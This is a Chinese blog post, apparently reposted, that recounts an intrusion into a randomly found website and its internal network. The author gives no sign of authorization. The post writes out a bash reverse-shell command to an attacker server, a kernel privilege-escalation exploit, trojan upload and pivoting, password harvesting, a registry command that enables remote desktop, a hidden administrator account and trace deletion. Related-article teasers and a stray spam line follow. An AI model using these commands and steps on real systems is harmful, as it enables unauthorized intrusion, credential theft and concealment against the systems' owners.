<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次滲透測試實戰記錄

    VSole2022-09-14 06:53:20

    0x01 突破邊界拿下shell

    周末在家閑著沒事突然就想搞事情了,然后使用Google hack語法輸入批量搜索可能存在上傳點的網站,試了好幾個最后找到一個可利用的上傳點。

    inurl:xxx.xxx.xxx/upload
    

    注:涉及敏感信息,圖片僅供參考,具體內容自行填充。

    0x02 反彈shell&提權

    Linux下需要把shell反彈出來以方便我們操作,但是目標主機上既沒有nc也沒有python,查詢相關資料后嘗試了一下利用bash彈shell。

    需要一臺公網服務器,使用命令bash -i >& /dev/tcp/your ip/1234 0>&1,公網服務器使用命令nc -lvp 1234監聽1234端口。

    現在shell已經反彈出來了,使用id命令查看當前權限,發現僅為Apache,使用-uname -a 查看內核版本,發現服務器內核版本為2.6.31.5-127.fc12.1686。

    在exploit-db中搜索此版本的相關漏洞,經過多次嘗試,發現了下面這個exp來提升權限。

    Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
    

    然而問題又來了,目標主機上沒有gcc,怎么辦?只能撞撞運氣嘗試在本地編譯好,再傳到目標主機上去執行。

    本地編譯好exp后傳到目標主機TMP路徑下,執行命令 chmod 777 a 賦予exp執行權限,然后執行 ./a 獲取到root權限。

    0x03 橫向滲透擼內網

    發現目標主機有內網環境,個人比較喜歡用msf,于是生成了個msf木馬上傳執行獲取到一個meterpreter shell。

    這里需要注意的是生成木馬時LHOST填你的服務器公網ip,設置msf監聽時LHOST需要填你服務器的內網ip。

    meterpreter shell執行run autoroute -s 10.1.1.0/24添加路由掃內網445,發現一臺內網機器存在ms17010,但是session彈不回來,尷尬。

    變換思路在邊界服務器上尋找有價值的可利用信息,最后發現了幾個password.txt和一個批量更新密碼的腳本,找到一個長得像管理員的密碼,這里不得不說一下在內網滲透中信息收集的重要性,這個密碼簡直太給力了。

    因為是內網,所以得用代理工具把本機代理進去,這里我用的是reGeorg-master,上傳tunnel.nosocket.php到網站目錄下,配合Proxifier進行全局代理(Linux下用proxychains)。用這個密碼登錄上了受害主機的ssh,ssh都拿到了,接下來把該刪掉的東西都刪掉。

    掃描內網機器10.1.1.17發現開了ftp,用上面那個密碼登錄進去了,就是這么巧。然后ftp傳馬,先傳了一個大馬。結果發現PHP版本太老了,然后上了個小馬,菜刀連接,直接system權限。

    發現沒開3389,使用命令

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    一鍵開啟遠程桌面,建立隱藏賬戶,成功連入遠程桌面。

    0x04 寫在后面的話

    第一次從外網滲透到內網,盯了三天終于擼下一臺,感覺這個內網還有的擼,有時間再繼續搞。

    shell滲透測試
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    看來這是他的個人博客,檢測到濃度看了看用的是世界上最安全的wordpress,看來這站不好拿啊,一般wordpress的前臺沒啥問題,但是如果登陸到管理員后臺基本上就寄了。接著翻了一下數據庫,發現有一個wp_usermeta的表很特殊,我懷疑這是不是分配用戶權限的地方很快一個地方就引起了我的注意本文盲去查了一下,發現是 帕瓦?
    因是內部系統,所以打碼稍微嚴重些。我看了登錄框,沒驗證碼,首先想到的肯定是對admin賬號先爆破一波。.那接下來就一切順利了,修改了admin密碼,并成功登陸,看到了所有分公司的數據。。。。。。。設計者這就應該挨板子了,再然后才有越權訪問admin信息,再有原密碼的繞過,這一系列小漏洞單獨來說不嚴重,但一旦結合起來,就出現了很嚴重的安全事件,在進行安全防護工作時,應盡量考慮周全,任何一個弱點都可能成為黑客的突破口。
    本文記錄了從一次未授權的訪問到獲取系統shell滲透測試過程,文中主要闡述了攻擊方法、漏洞成因以及防御思路。在進行攻防過程階段,最重要的工作莫過于信息收集,本文不想記錄對信息收集中的數據反復甄別的過程,而是想對一次重大的發現進行過程記錄,通過對收集的數據進行反復的篩選發現了2375端口,相信很多在做云原生或者做容器化部署的朋友,應該對這個端口不陌生,沒錯這個就是docker swarm。從官方的
    0x01 起源某天比較無聊,聽一個朋友推薦httpscan這款工具,于是就下載下來試試。首先對某學校網段開始進行測試測試時發現有個比較特殊的標題,一般有這個,證明存在目錄遍歷。這個就又比較開心,看到了phpinfo,這個文件和目錄遍歷漏洞性質也差不多,說大也大,說小也小。phpinfo屬于處在信息收集階段的一個重頭,當有了這些信息,可以看出服務器端調用了那些庫,以及一些敏感路徑,從而進行深入的漏洞挖掘,用途也是很廣的。
    0x02 內網怎么會有這么多WEB服務?進,可以用各種姿勢getshell甚至直接執行命令;退,即使不能getshell,通過尋找各種信息,也通常可以拿下其它系統,或者是直接用于釣魚。這里有個WP,那先看看WP用戶信息。root@localhost的密碼,和上面找到的root_lcy密碼一樣,都查不出來,推測這個就是這位鄰居的常用密碼了。OK,內網這部分算是打完了。
    本實驗環境靶場以發出,從外到內,給你服務器干翻!
    0x01 突破邊界拿下shell周末在家閑著沒事突然就想搞事情了,然后使用Google hack語法輸入批量搜索可能存在上傳點的網站,試了好幾個最后找到一個可利用的上傳點。反彈shell&提權Linux下需要把shell反彈出來以方便我們操作,但是目標主機上既沒有nc也沒有python,查詢相關資料后嘗試了一下利用bash彈shell。在exploit-db中搜索此版本的相關漏洞,經過多次嘗試,發現了下面這個exp來提升權限。一鍵開啟遠程桌面,建立隱藏賬戶,成功連入遠程桌面。
    滲透測試輔助工具箱
    2023-05-12 14:08:08
    刪除記錄:刪除指定id主頁面MSF頁面正則表達式頁面小工具頁面0x03 免責聲明本工具僅能在取得足夠合法授權的企業安全建設中使用,在使用本工具過程中,您應確保自己所有行為符合當地的法律法規。該工具僅用于學習交流,如您在使用本工具的過程中存在任何非法行為,您將自行承擔所有后果,本工具所有開發者和本公眾號不承擔任何法律及連帶責任。
    0X1 BerylEnigma介紹一個CTF+滲透測試工具包,主要實現一些常用的加密與編碼功能,前身為CryptionTool,為更方便的開發更換框架重構。軟件基于JDK17開發,使用JAVAFX UI框架以及JFoenixUI組件架構。0X2 BerylEnigma功能現代古典紅隊操作工具文本操作工具HTLM-hashROT13目標整理文本替換JWT柵欄密碼域名分割文本分隔認證Atbash回彈shell生成英文大小寫轉換hashVigenre文本行拼接SM3凱撒密碼編碼待辦清單URL編碼 - Base64編碼增強ASCII圖像工具 - 二維碼Base64現代加密 - AES,DESBrainFuck現代加密 -?
    由于低權限用戶無法執行太多操作,可以利用反彈上傳Churrasco.exe,后續可以利用它來做提權。輸入net user指令查看是否添加成功,最后提權成功。linux系統提權思路linux基礎信息收集uname -a 顯示全部系統信息cat /etc/issue 內核信息。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类